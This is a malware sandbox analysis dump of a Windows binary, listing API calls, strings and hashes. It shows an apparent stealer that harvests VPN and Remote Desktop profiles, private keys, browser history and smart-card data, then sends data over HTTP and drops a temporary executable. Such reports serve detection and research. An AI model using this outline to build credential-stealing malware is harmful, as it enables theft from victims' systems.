                                                                                                          • Part of subcall function 00007FF7327A3220: LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7327A2C48), ref: 00007FF7327A3336
                                                                                                          • Part of subcall function 00007FF7327A3220: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7327A2C48), ref: 00007FF7327A3380
                                                                                                          • Part of subcall function 00007FF7327A3220: VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7327A33AC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.4176871660.00007FF7327A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7327A0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.4176808164.00007FF7327A0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 0000000A.00000002.4176947542.00007FF7327B1000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 0000000A.00000002.4176988341.00007FF7327B4000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 0000000A.00000002.4177025957.00007FF7327B5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_7ff7327a0000_9245.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Cert$Time$Name$CertificateCertificatesCryptEnumFileHeapStoreSystem$AcquireAddressContextFreeLibraryLoadPrivateProcProcessPropertyProtectStringUserVirtualwvsprintf
                                                                                                        • String ID: 1.2.840.113549
                                                                                                        • API String ID: 2787208766-3888290641
                                                                                                        • Opcode ID: 7c118aa1dc638b74cc484d50b524cc29b5b0ce845a120789e24d602a0ca92301
                                                                                                        • Instruction ID: 4e5e00fa623b52cc959a51ee97a579a790a6c27d4cef5ca2d5f1d2a2b8d3df26
                                                                                                        • Opcode Fuzzy Hash: 7c118aa1dc638b74cc484d50b524cc29b5b0ce845a120789e24d602a0ca92301
                                                                                                        • Instruction Fuzzy Hash: 09B1C662A0868295EB90EF52D4512BEE765FB8ABD4F800031EF8D07B59DFBCE104DB50

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.4176871660.00007FF7327A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7327A0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.4176808164.00007FF7327A0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 0000000A.00000002.4176947542.00007FF7327B1000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 0000000A.00000002.4176988341.00007FF7327B4000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 0000000A.00000002.4177025957.00007FF7327B5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_7ff7327a0000_9245.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateErrorLast$Pipe$CloseHandleProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 2620922840-0
                                                                                                        • Opcode ID: 06c27cac1460b1730935b6838723191b56705425c7e0ff509bc79b6fafc0960c
                                                                                                        • Instruction ID: 948c51c7ffb6c4a5a0286e3a7baf6b19695674b87a4e07c0d8de3a91aa97d7fb
                                                                                                        • Opcode Fuzzy Hash: 06c27cac1460b1730935b6838723191b56705425c7e0ff509bc79b6fafc0960c
                                                                                                        • Instruction Fuzzy Hash: 8A517F32B08A42A9FB50EF61D4543ED63A1BB5EB98F800035EF0D97B59DEB8E109D750

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.4176871660.00007FF7327A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7327A0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.4176808164.00007FF7327A0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 0000000A.00000002.4176947542.00007FF7327B1000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 0000000A.00000002.4176988341.00007FF7327B4000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 0000000A.00000002.4177025957.00007FF7327B5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_7ff7327a0000_9245.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Cert$NameStore$CertificatesCloseEnumOpenString
                                                                                                        • String ID: +ss$+sls$fs{s${s{s
                                                                                                        • API String ID: 3617724111-3691527440
                                                                                                        • Opcode ID: 4a17e9d2c0338b9fb344b6cd7c9cf4f240aa7ae834c0939f847d1c0c3c5c31e0
                                                                                                        • Instruction ID: f81c53eb360ae3fa0bee0b54c6c6c2b6c6c3dc27e32d8f3db8ef9a210bb277ae
                                                                                                        • Opcode Fuzzy Hash: 4a17e9d2c0338b9fb344b6cd7c9cf4f240aa7ae834c0939f847d1c0c3c5c31e0
                                                                                                        • Instruction Fuzzy Hash: 6921B672A186C291E790EB16E4402AAE361FB8ABD0F849031EB8E47759DE7CE404DB50

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.4176871660.00007FF7327A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7327A0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.4176808164.00007FF7327A0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 0000000A.00000002.4176947542.00007FF7327B1000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 0000000A.00000002.4176988341.00007FF7327B4000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 0000000A.00000002.4177025957.00007FF7327B5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_7ff7327a0000_9245.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CertEnumStoreSystem
                                                                                                        • String ID: ":{$"_":""
                                                                                                        • API String ID: 4132996702-2026347918
                                                                                                        • Opcode ID: 44da9b9bff8289d620a86c1f64e4909e3ecd95bd993dcceb9904786bee631e33
                                                                                                        • Instruction ID: ddffd0a9e684fa4f614f70ffa96e5cdc2f0596f2d31b9793b77debefaf39cf37
                                                                                                        • Opcode Fuzzy Hash: 44da9b9bff8289d620a86c1f64e4909e3ecd95bd993dcceb9904786bee631e33
                                                                                                        • Instruction Fuzzy Hash: B001A215E0869161FA44FB56A4000B99359BF9EFD0FC89031EE1E4776ACFACF142D350

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.4176871660.00007FF7327A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7327A0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.4176808164.00007FF7327A0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 0000000A.00000002.4176947542.00007FF7327B1000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 0000000A.00000002.4176988341.00007FF7327B4000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 0000000A.00000002.4177025957.00007FF7327B5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_7ff7327a0000_9245.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CertEnumLocationStoreSystem
                                                                                                        • String ID: "_": ""
                                                                                                        • API String ID: 863500693-1453221996
                                                                                                        • Opcode ID: ac8b6152a2a2325c9d9276e908165484d39c70b2a51ab9d8d04172e70dc37df3
                                                                                                        • Instruction ID: 641b93e04bf40e8411010e8844afdf19ab46dcd1d330eef22825e4ae4e958590
                                                                                                        • Opcode Fuzzy Hash: ac8b6152a2a2325c9d9276e908165484d39c70b2a51ab9d8d04172e70dc37df3
                                                                                                        • Instruction Fuzzy Hash: 06E06D45B1854360EE84BBA2A8110F493197F5EBD0FC82032EA1F06366DDACF189D320

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.4176871660.00007FF7327A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7327A0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.4176808164.00007FF7327A0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 0000000A.00000002.4176947542.00007FF7327B1000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 0000000A.00000002.4176988341.00007FF7327B4000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 0000000A.00000002.4177025957.00007FF7327B5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_7ff7327a0000_9245.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileNamedPeekPipeRead
                                                                                                        • String ID:
                                                                                                        • API String ID: 327342812-0
                                                                                                        • Opcode ID: 34d1d673edd9c40d02f270326efd511933567532b5db1aeb081074a9eac190bf
                                                                                                        • Instruction ID: 4a5a8d0dc985addb9551c38d34729299b54496951686ead1c2f12fb8163521cd
                                                                                                        • Opcode Fuzzy Hash: 34d1d673edd9c40d02f270326efd511933567532b5db1aeb081074a9eac190bf
                                                                                                        • Instruction Fuzzy Hash: 3601C022B2868297E790AF16E44077AE3A0FB8ABE4F944134DB484B754DFBCE450DB50

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.4176871660.00007FF7327A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7327A0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.4176808164.00007FF7327A0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 0000000A.00000002.4176947542.00007FF7327B1000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 0000000A.00000002.4176988341.00007FF7327B4000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 0000000A.00000002.4177025957.00007FF7327B5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_7ff7327a0000_9245.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CodeExitNamedObjectPeekPipeProcessSingleWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 2021502500-0

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 695 7ff7327a1a70-7ff7327a1ab8 call 7ff7327a1918 wvsprintfW
                                                                                                        APIs
                                                                                                        Similarity
                                                                                                        • API ID: wvsprintf
                                                                                                        • String ID:
                                                                                                        • API String ID: 2795597889-0

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 698 7ff7327a79c4-7ff7327a79d9 GetNativeSystemInfo 699 7ff7327a79e7 698->699 700 7ff7327a79db-7ff7327a79e1 698->700 702 7ff7327a79e9-7ff7327a79ed 699->702 700->699 701 7ff7327a79e3-7ff7327a79e5 700->701 701->702
                                                                                                        APIs
                                                                                                        • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00007FF7327A74DE), ref: 00007FF7327A79CD
                                                                                                        Similarity
                                                                                                        • API ID: InfoNativeSystem
                                                                                                        • String ID:
                                                                                                        • API String ID: 1721193555-0
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Similarity
                                                                                                        • API ID: File$Path$ExistsHeap$AppendCreateEnvironmentProcessReadSizeVariable$CombineFreeQuoteSpaceslstrcatlstrlen
                                                                                                        • String ID: ", "group": "$", "host": "$"user": "$</DefaultGroup>$</DefaultHostName>$</DefaultUser>$<DefaultGroup>$<DefaultHostName>$<DefaultUser>$Software\Fortinet\FortiClient\Sslvpn\Tunnels$Software\Microsoft\Terminal Server Client\Servers$Software\SonicWALL\SSL-VPN NetExtender\Standalone\Profiles$Software\SonicWall\SSL-VPN NetExtender\Standalone$]},$}},
                                                                                                        • API String ID: 2508640211-1951492331
                                                                                                        APIs
                                                                                                        • CertGetCertificateContextProperty.CRYPT32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7327A2C48), ref: 00007FF7327A325E
                                                                                                        • CryptAcquireCertificatePrivateKey.CRYPT32 ref: 00007FF7327A328D
                                                                                                        • CryptGetUserKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7327A2C48), ref: 00007FF7327A32BB
                                                                                                          • Part of subcall function 00007FF7327A36F0: CryptExportKey.ADVAPI32 ref: 00007FF7327A3744
                                                                                                          • Part of subcall function 00007FF7327A36F0: CryptExportKey.ADVAPI32 ref: 00007FF7327A379E
                                                                                                        • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7327A2C48), ref: 00007FF7327A3336
                                                                                                        • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7327A2C48), ref: 00007FF7327A3380
                                                                                                        • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7327A33AC
                                                                                                        • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7327A33DC
                                                                                                        • CryptExportKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7327A3404
                                                                                                        • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7327A341C
                                                                                                        • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7327A343F
                                                                                                        • CryptAcquireContextA.ADVAPI32 ref: 00007FF7327A3459
                                                                                                        • CryptImportKey.ADVAPI32 ref: 00007FF7327A347E
                                                                                                        • OpenSCManagerA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7327A2C48), ref: 00007FF7327A34B5
                                                                                                        • OpenServiceA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7327A2C48), ref: 00007FF7327A3505
                                                                                                        • QueryServiceStatusEx.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7327A2C48), ref: 00007FF7327A3523
                                                                                                        • OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7327A2C48), ref: 00007FF7327A3532
                                                                                                        • ReadProcessMemory.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7327A2C48), ref: 00007FF7327A355D
                                                                                                        • ReadProcessMemory.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7327A2C48), ref: 00007FF7327A357C
                                                                                                        • WriteProcessMemory.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7327A359F
                                                                                                        • NCryptExportKey.NCRYPT ref: 00007FF7327A3605
                                                                                                        • CertOpenStore.CRYPT32 ref: 00007FF7327A3667
                                                                                                        • CertAddCertificateLinkToStore.CRYPT32 ref: 00007FF7327A3682
                                                                                                        • CertSetCertificateContextProperty.CRYPT32 ref: 00007FF7327A369E
                                                                                                        • PFXExportCertStoreEx.CRYPT32 ref: 00007FF7327A36BD
                                                                                                        • PFXExportCertStoreEx.CRYPT32 ref: 00007FF7327A36DF
                                                                                                        Strings
                                                                                                        Similarity
                                                                                                        • API ID: Crypt$CertExport$CertificateOpenProcessProtectStoreVirtual$ContextMemory$AcquirePropertyReadService$AddressImportLibraryLinkLoadManagerPrivateProcQueryStatusUserWrite
                                                                                                        • String ID: -,0z$5)F$CAPIPRIVATEBLOB$Microsoft Software Key Storage Provider$km{l
                                                                                                        • API String ID: 2161712720-385819238
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Similarity
                                                                                                        • API ID: Http$CloseHandle$DataHeapOpenOptionQueryRequest$AvailableConnectCrackFreeProcessReadReceiveResponseSend
                                                                                                        • String ID: <r;r$?r r$?r r
                                                                                                        • API String ID: 199669925-2032818692
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Similarity
                                                                                                        • API ID: File$lstrcat$Close$FindHandleHeapView__memcpylstrlen$ByteCharCreateEnvironmentExistsFirstFreeMappingMultiOpenPathProcessSizeUnmapVariableWidelstrcpy
                                                                                                        • String ID: *.default-release$APPDATA$\places.sqlite
                                                                                                        • API String ID: 4154822446-3438982840
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Similarity
                                                                                                        • API ID: Card$CardsFreeListMemory$ChangeStatus
                                                                                                        • String ID: "_": ""$%02X
                                                                                                        • API String ID: 2879528921-1880646522
                                                                                                        APIs
                                                                                                        Similarity
                                                                                                        • API ID: Process$AddressCurrentLibraryLoadProcWow64
                                                                                                        • String ID:
                                                                                                        • API String ID: 4035193891-0
                                                                                                        Similarity
                                                                                                        • API ID: CryptExport$HeapProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 532797600-0
                                                                                                        Similarity
                                                                                                        • API ID: File$Heap$Process$CloseHandleViewlstrlen$ByteCharCreateExistsFreeMappingMultiOpenPathSizeUnmapWide__memcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 2161876737-0
                                                                                                        Similarity
                                                                                                        • API ID: File$Time$CloseCreateExecuteHandlePathShellSystemTempWritewsprintf
                                                                                                        • String ID: %08X.exe$open
                                                                                                        • API String ID: 2307396689-1771423410
                                                                                                        Similarity
                                                                                                        • API ID: File$lstrcatlstrlen$CloseHandleHeapView__memcpy$ByteCharCreateEnvironmentExistsFreeMappingMultiOpenPathProcessSizeUnmapVariableWide
                                                                                                        • String ID: Default$LOCALAPPDATA$\History
                                                                                                        • API String ID: 3980575106-3555721359
                                                                                                        Similarity
                                                                                                        • API ID: CreateInitializeInstanceUninitialize
                                                                                                        • String ID: http
                                                                                                        • API String ID: 948891078-2541227442
                                                                                                        Similarity
                                                                                                        • API ID: Time$FileProcessSystem$CloseCodeExitHandleNamedObjectPeekPipeSingleTerminateWait
                                                                                                        • String ID: exit
                                                                                                        • API String ID: 1626563136-1626635026
                                                                                                        Similarity
                                                                                                        • API ID: Create$ArrayFileSafe$DataStringTime$AccessAllocCloseExecuteFreeHandleInitInitializeInstancePathShellSystemTempUnaccessVariantVectorWritewsprintf
                                                                                                        • String ID:
                                                                                                        • API String ID: 1750269033-0
                                                                                                        APIs
                                                                                                          • Part of subcall function 00007FF7327A25DC: GetProcessHeap.KERNEL32(?,?,?,00007FF7327A1985,?,?,?,00007FF7327A155F), ref: 00007FF7327A25E5
                                                                                                        • __memcpy.DELAYIMP ref: 00007FF7327AED43
                                                                                                          • Part of subcall function 00007FF7327B0114: __memcpy.DELAYIMP ref: 00007FF7327B0145
                                                                                                          • Part of subcall function 00007FF7327B0114: __memcpy.DELAYIMP ref: 00007FF7327B0153
                                                                                                          • Part of subcall function 00007FF7327AEB94: lstrlenA.KERNEL32 ref: 00007FF7327AEBB1
                                                                                                          • Part of subcall function 00007FF7327A25B4: GetProcessHeap.KERNEL32 ref: 00007FF7327A25C1
                                                                                                          • Part of subcall function 00007FF7327A25B4: HeapFree.KERNEL32 ref: 00007FF7327A25CF
                                                                                                        Similarity
                                                                                                        • API ID: Heap__memcpy$Process$Freelstrlen
                                                                                                        • String ID: last_visit_time$table$url$urls
                                                                                                        • API String ID: 2336645791-3896411411
                                                                                                        • Opcode ID: d5d9a79c7b40b120fcd0d5f95854f23203b021debaa7a14ff8f866156a15b791
                                                                                                        • Instruction ID: cf297d38b9eaa77b0940d91d380931b00e79ee082de57e5817b5d914ea773780
                                                                                                        • Opcode Fuzzy Hash: d5d9a79c7b40b120fcd0d5f95854f23203b021debaa7a14ff8f866156a15b791
                                                                                                        • Instruction Fuzzy Hash: 5831A722A1D68262EAA0EB26E4401BEE350FF8ABD0F804031DF4D47795EEBCF455E750
                                                                                                        APIs
                                                                                                          • Part of subcall function 00007FF7327A25DC: GetProcessHeap.KERNEL32(?,?,?,00007FF7327A1985,?,?,?,00007FF7327A155F), ref: 00007FF7327A25E5
                                                                                                        • __memcpy.DELAYIMP ref: 00007FF7327AEF63
                                                                                                          • Part of subcall function 00007FF7327B0114: __memcpy.DELAYIMP ref: 00007FF7327B0145
                                                                                                          • Part of subcall function 00007FF7327B0114: __memcpy.DELAYIMP ref: 00007FF7327B0153
                                                                                                          • Part of subcall function 00007FF7327AEB94: lstrlenA.KERNEL32 ref: 00007FF7327AEBB1
                                                                                                          • Part of subcall function 00007FF7327A25B4: GetProcessHeap.KERNEL32 ref: 00007FF7327A25C1
                                                                                                          • Part of subcall function 00007FF7327A25B4: HeapFree.KERNEL32 ref: 00007FF7327A25CF
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.4176871660.00007FF7327A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7327A0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.4176808164.00007FF7327A0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 0000000A.00000002.4176947542.00007FF7327B1000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 0000000A.00000002.4176988341.00007FF7327B4000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 0000000A.00000002.4177025957.00007FF7327B5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_7ff7327a0000_9245.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Heap__memcpy$Process$Freelstrlen
                                                                                                        • String ID: last_visit_date$moz_places$table$url
                                                                                                        • API String ID: 2336645791-66087218
                                                                                                        • Opcode ID: f9355e031720a999b2833bedf3602efa1e9d778dc8acbfa60e7b4b373426d685
                                                                                                        • Instruction ID: 12f89d51fd89f4c3e2ad465ad35f16e4b8edbb99de4fdc8f9ab9442430590c88
                                                                                                        • Opcode Fuzzy Hash: f9355e031720a999b2833bedf3602efa1e9d778dc8acbfa60e7b4b373426d685
                                                                                                        • Instruction Fuzzy Hash: 7631B82260974261EAA4FB26E4411AAA350FF9ABD0FC04132DF4E47795EEBDF447E710
                                                                                                        APIs
                                                                                                          • Part of subcall function 00007FF7327A25DC: GetProcessHeap.KERNEL32(?,?,?,00007FF7327A1985,?,?,?,00007FF7327A155F), ref: 00007FF7327A25E5
                                                                                                        • __memcpy.DELAYIMP ref: 00007FF7327AF18F
                                                                                                          • Part of subcall function 00007FF7327B0114: __memcpy.DELAYIMP ref: 00007FF7327B0145
                                                                                                          • Part of subcall function 00007FF7327B0114: __memcpy.DELAYIMP ref: 00007FF7327B0153
                                                                                                          • Part of subcall function 00007FF7327AEB94: lstrlenA.KERNEL32 ref: 00007FF7327AEBB1
                                                                                                          • Part of subcall function 00007FF7327A25B4: GetProcessHeap.KERNEL32 ref: 00007FF7327A25C1
                                                                                                          • Part of subcall function 00007FF7327A25B4: HeapFree.KERNEL32 ref: 00007FF7327A25CF
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.4176871660.00007FF7327A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7327A0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.4176808164.00007FF7327A0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 0000000A.00000002.4176947542.00007FF7327B1000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 0000000A.00000002.4176988341.00007FF7327B4000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 0000000A.00000002.4177025957.00007FF7327B5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_7ff7327a0000_9245.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Heap__memcpy$Process$Freelstrlen
                                                                                                        • String ID: last_visit_time$table$url$urls
                                                                                                        • API String ID: 2336645791-3896411411
                                                                                                        • Opcode ID: e545b317cdac597c395dbcae4aa48d93bb7f4768476dea28865c2df9a88b3085
                                                                                                        • Instruction ID: 1a961135c200279a029bf47a958f5dbef472aea9eb9d1b4770ca0926d445f449
                                                                                                        • Opcode Fuzzy Hash: e545b317cdac597c395dbcae4aa48d93bb7f4768476dea28865c2df9a88b3085
                                                                                                        • Instruction Fuzzy Hash: 9831BA2160D782A1EAA0FB26E4401AAA350FF8ABD0F808031DF5D47795EEBDF546E751
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.4176871660.00007FF7327A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7327A0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.4176808164.00007FF7327A0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 0000000A.00000002.4176947542.00007FF7327B1000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 0000000A.00000002.4176988341.00007FF7327B4000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 0000000A.00000002.4177025957.00007FF7327B5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_7ff7327a0000_9245.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AppendPathlstrcpy
                                                                                                        • String ID: ":"$"},$Software\Fortinet\FortiClient\Sslvpn\Tunnels
                                                                                                        • API String ID: 3043196718-4231764533
                                                                                                        • Opcode ID: 8f58ea5ad3b518f49ceb7b46cbd7adf588816f50efc6b121aa6a33ae32cd25e4
                                                                                                        • Instruction ID: 8f08afd6ce1914e99465b233d369551185649462ece1dc1f13932e550d950e12
                                                                                                        • Opcode Fuzzy Hash: 8f58ea5ad3b518f49ceb7b46cbd7adf588816f50efc6b121aa6a33ae32cd25e4
                                                                                                        • Instruction Fuzzy Hash: 6A31B172A18A81A5EA60EF61E4041E9A365FB8EBD0F844132EF5D07799CE7CE504D710
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.4176871660.00007FF7327A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7327A0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.4176808164.00007FF7327A0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 0000000A.00000002.4176947542.00007FF7327B1000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 0000000A.00000002.4176988341.00007FF7327B4000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 0000000A.00000002.4177025957.00007FF7327B5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_7ff7327a0000_9245.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseCreateValue
                                                                                                        • String ID: ?
                                                                                                        • API String ID: 1818849710-1684325040
                                                                                                        • Opcode ID: 95ba9ea116202154f80c3a303d626d01697fe8fb572a65aab9065d47d504427e
                                                                                                        • Instruction ID: f1c38058cba22c6b223779eb70aba6fdfdd2fc49804ff7ede0087b1ed22006e7
                                                                                                        • Opcode Fuzzy Hash: 95ba9ea116202154f80c3a303d626d01697fe8fb572a65aab9065d47d504427e
                                                                                                        • Instruction Fuzzy Hash: 5521C473A187809AE7209F75A8402EDBBA0FB5D7A8B944225EB8D03B59DF7CD144DB10
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.4176871660.00007FF7327A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7327A0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.4176808164.00007FF7327A0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 0000000A.00000002.4176947542.00007FF7327B1000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 0000000A.00000002.4176988341.00007FF7327B4000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 0000000A.00000002.4177025957.00007FF7327B5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_7ff7327a0000_9245.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: HeapValue$AppendFreePathProcesslstrcpy
                                                                                                        • String ID: "},$Software\SonicWALL\SSL-VPN NetExtender\Standalone\Profiles
                                                                                                        • API String ID: 784796242-1893226844
                                                                                                        • Opcode ID: cb7a6499aa34e5c2d2a12428343009169a242363acc74ead088cd1ca5e2489a2
                                                                                                        • Instruction ID: 9d84ae9a93bd8027b7a39ac97e680e3b814b634f5994889407e6b0ef57614a88
                                                                                                        • Opcode Fuzzy Hash: cb7a6499aa34e5c2d2a12428343009169a242363acc74ead088cd1ca5e2489a2
                                                                                                        • Instruction Fuzzy Hash: 8C116012A08682A0E960FB51E8552FAE351FF8EBD0FC45131EB5E477AADEACF104D750
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.4176871660.00007FF7327A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7327A0000, based on PE: true
